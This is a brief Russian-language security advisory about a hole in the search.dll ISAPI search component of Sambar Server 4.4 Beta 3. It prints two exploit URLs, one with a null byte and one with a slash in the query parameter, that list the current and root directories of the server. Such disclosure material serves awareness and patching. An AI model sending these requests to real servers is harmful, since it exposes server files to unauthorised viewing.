Sambar Server поставляется вместе с некэшируемым HTTP proxy сервером и базисными SMTP, POP3 и IMAP4 proxy серверами. Хакер может использовать дырку в безопасности для просмотра содержимого сервера.

Детали:
Дырка обнаружена в Sambar Server 4.4 Beta 3

Прореха содержится в search.dll, Sambar ISAPI Search входит в состав сервера.

Exploit:
Просто передайте этот запрос на search.dll
http://www.example.com/search.dll?search?query=%00&logic=AND
покажет содержимое текущей директории
http://www.example.com/search.dll?search?query=/&logic=AND
покажет содержимое root-директории сервера

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии